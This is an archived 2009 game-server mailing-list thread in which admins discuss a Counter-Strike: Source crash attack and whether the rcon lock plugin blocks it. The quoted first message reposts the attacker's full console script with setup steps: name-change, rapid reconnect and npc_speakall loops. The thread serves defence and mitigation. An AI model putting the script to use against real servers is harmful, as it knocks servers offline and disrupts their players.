Somebody actually just tried this on my server in the last 10 minutes, and rcon lock definitely blocked it:
L 08/23/2009 - 04:21:59: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203: I tried it on my own test server after as well, and "rcon lock" blocked it there as well. On Sun, Aug 23, 2009 at 4:18 AM, Kyle Sanderson <[email protected]> wrote: > Sorry for the double mail, > Here is a youtube video that I found showing off this exploit. > http://www.youtube.com/watch?v=8ScKSfsd3TU > > Kyle. > > On Sun, Aug 23, 2009 at 3:46 AM, Kyle Sanderson <[email protected]> > wrote: > > > I have Rcon Lock installed, this attack still works as it's not calling > any > > commands rather than just calling retry in 0.01second intervals. I was > just > > thinking about a plugin/script that would ban someones IP for 5 minutes > > after a person connects 2times in 5 seconds? > > > > I don't know if that's even possible, > > Kyle. > > > > > > On Sun, Aug 23, 2009 at 2:18 AM, P. Bhandal <[email protected]> wrote: > > > >> I'm not at home, so I can't test it right now, but I believe > DeviceNull's > >> rcon lock plugin blocks clients from sending commands before they are > >> fully > >> connected. You can find more details on it here: > >> > >> http://forums.alliedmods.net/showthread.php?p=841590 > >> > >> On Sun, Aug 23, 2009 at 2:01 AM, Kyle Sanderson <[email protected]> > >> wrote: > >> > >> > Not sure how many of you have encountered this script. But it has been > >> > taking my server down quite a bit lately. Just found the kid on FPSB > >> > posting > >> > his script up so here we are. > >> > > >> > Hey guys im releasing my Green Null Name Exploit > >> > (BTW SAVE THIS AS A text file) > >> > > >> > > >> > 1) now u have a .txt file u make a folder in ur c strike called > >> testscripts > >> > 2) open the .txt and edit it to make anything you want the symbols in > >> there > >> > between letters make the color of your name change so keep those in > >> there > >> > 3) put the script in your testscripts folder > >> > 4) open counter strike and now join a server and put this in console > >> > Test_StartScript crash.txt > >> > only leave it as crash.txt if u dont change the name of your file. > >> > > >> > Setinfo name " CaM FuCkEd Up ThE SeRvEr... " > >> > retry > >> > Test_Wait .75 > >> > disconnect > >> > Test_Wait .2 > >> > setinfo name " CaM FuCkEd Up ThE SeRvEr... " > >> > Test_Wait .1 > >> > retry > >> > Test_Wait .75 > >> > disconnect > >> > Test_Wait .2 > >> > setinfo name " CaM FuCkEd Up ThE SeRvEr... " > >> > Test_Wait .1 > >> > retry > >> > Test_Wait .75 > >> > disconnect > >> > Test_Wait .1 > >> > setinfo name " C a m W i n s " > >> > > >> > Test_StartLoop spamcrash > >> > retry > >> > Test_Wait 0.01 > >> > disconnect > >> > Test_Wait 0.01 > >> > Test_LoopForNumSeconds spamcrash 1 > >> > > >> > Test_Wait .1 > >> > retry; > >> > > >> > Test_StartLoop crash > >> > npc_speakall > >> > Test_Wait 0.01 > >> > Test_LoopForNumSeconds crash 2 > >> > disconnect; > >> > > >> > > >> > http://www.fpsbanana.com/scripts/5196 > >> > > >> > Anyways, hope this helps some of you and maybe a script/patch can be > >> made > >> > via sourcemod. I've already blocked the string npc_speakall via > iptables > >> > but > >> > that had no effect (Not even sure if that calls any functions on the > >> > server.) I'm running CentOS 32bit and a bunch of CS:S servers. > >> > Kyle. > >> > _______________________________________________ > >> > To unsubscribe, edit your list preferences, or view the list archives, > >> > please visit: > >> > http://list.valvesoftware.com/mailman/listinfo/hlds > >> > > >> _______________________________________________ > >> To unsubscribe, edit your list preferences, or view the list archives, > >> please visit: > >> http://list.valvesoftware.com/mailman/listinfo/hlds > >> > > > > > _______________________________________________ > To unsubscribe, edit your list preferences, or view the list archives, > please visit: > http://list.valvesoftware.com/mailman/listinfo/hlds > _______________________________________________ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds
